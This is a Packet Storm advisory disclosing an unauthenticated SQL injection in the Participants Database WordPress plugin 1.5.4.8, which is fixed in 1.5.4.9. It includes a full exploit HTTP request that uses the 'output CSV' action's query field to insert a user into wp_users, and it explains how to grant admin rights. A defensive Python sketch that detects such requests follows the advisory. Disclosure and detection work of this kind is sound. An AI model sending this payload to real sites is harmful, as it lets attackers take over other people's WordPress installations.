WordPress Participants Database 1.5.4.8 SQL Injection

02 Jun 2014 | Reported by: Yarubo Research Team | Type: packetstorm | Source: packetstormsecurity.com

Participants Database Wordpress 1.5.4.8 SQL Injection allows unauthenticated attackers to fully compromise the installation

Code
`Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress  
=========================================================================  
  
Program: Participants Database <= 1.5.4.8  
Severity: Unauthenticated attacker can fully compromise the Wordpress  
installation  
Permalink: http://www.yarubo.com/advisories/1  
  
— Info —  
  
Participants Database is a popular Wordpress plugin that offers the  
functionality needed to build and maintain a database of people. As of  
today the plugin has been downloaded 92,089 times.  
  
— Vulnerability details —  
  
1. Due to insufficient privilege checks it is possible for anonymous  
(unauthenticated) users to trigger some administrative actions if any of  
the shortcodes is used (e.g. signup page).  
  
2. The action "export CSV" takes a parameter called "query" that can  
contain an arbitrary SQL query. This means that an unauthenticated user can  
execute arbitrary SQL statements (e.g. create an admin user, read or write  
files, or execute code depending on the MySQL user privileges).  
  
  
— Exploit —  
  
Add a user to wordpress as follows (if you want an admin user, also add  
admin privileges to wp_usermeta):  
  
  
POST /wordpress/pdb-signup/ HTTP/1.1  
Host: www.example.com  
Content-Length: 789  
(…)  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN  
  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="action"  
  
output CSV  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="CSV_type"  
  
participant list  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="subsource"  
  
participants-database  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="query"  
  
INSERT INTO wp_users  
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)  
VALUES  
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);  
  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
  
  
  
— Solution —  
  
This issue has been fixed in version 1.5.4.9. Download the newest version  
from:  
  
https://wordpress.org/plugins/participants-database/  
  
  
— Credit —  
  
  
Yarubo Research Team  
research [at] yarubo.com  
  
Network Security Scan:  
http://www.yarubo.com/  
  
Free Heartbleed Scan:  
http://www.yarubo.com/heartbleed  
`
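
A detection sketch for the request shape the advisory describes, added here as an example (not code from Yarubo or from the plugin): it parses a multipart/form-data body and flags requests whose `action` is `output CSV` and that carry a `query` field. The function names, the constructed sample bodies, and the use of a missing `wordpress_logged_in_` cookie as a heuristic for an anonymous request are assumptions of this example.

```python
import re

# Field names and the "output CSV" action value come from the advisory's request.
EXPORT_ACTION = "output csv"
LOGIN_COOKIE = "wordpress_logged_in_"  # WordPress login cookie name prefix

def form_fields(content_type, body):
    """Parse a multipart/form-data body into {field name: text value}."""
    m = re.search(r'boundary="?([^";\s]+)', content_type)
    if not m:
        return {}
    fields = {}
    for part in body.split(b"--" + m.group(1).encode()):
        head, sep, value = part.partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', head)
        if sep and name:  # skips the preamble and the closing "--" marker
            fields[name.group(1).decode()] = value.strip().decode("utf-8", "replace")
    return fields

def classify(content_type, cookie_header, body):
    """Return None, or a finding for a CSV export request that carries SQL."""
    fields = form_fields(content_type, body)
    if fields.get("action", "").lower() != EXPORT_ACTION or "query" not in fields:
        return None
    verb = (re.match(r"\s*([A-Za-z]+)", fields["query"]) or [None, ""])[1].upper()
    anonymous = LOGIN_COOKIE not in (cookie_header or "")
    return {
        "anonymous": anonymous,
        "sql_verb": verb,
        # An export only needs to read; any other verb is a write or DDL attempt.
        "severity": "high" if anonymous or verb != "SELECT" else "review",
    }

def sample_body(boundary, **fields):
    """Build a constructed multipart body for the samples below."""
    out = b""
    for k, v in fields.items():
        out += (f'--{boundary}\r\nContent-Disposition: form-data; '
                f'name="{k}"\r\n\r\n{v}\r\n').encode()
    return out + f"--{boundary}--\r\n".encode()

# Constructed samples: one shaped like the advisory's request, one ordinary form post.
B = "----constructedBoundary"
CT = f"multipart/form-data; boundary={B}"
EXPLOIT_SHAPED = sample_body(B, action="output CSV", CSV_type="participant list",
                             subsource="participants-database",
                             query="INSERT INTO wp_users (...) VALUES (...)")
ORDINARY_POST = sample_body(B, action="signup", first_name="Ada")
```

The cookie check only shows that no login cookie was sent; it does not validate a session, so a "review" result still needs to be matched against real administrator activity.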
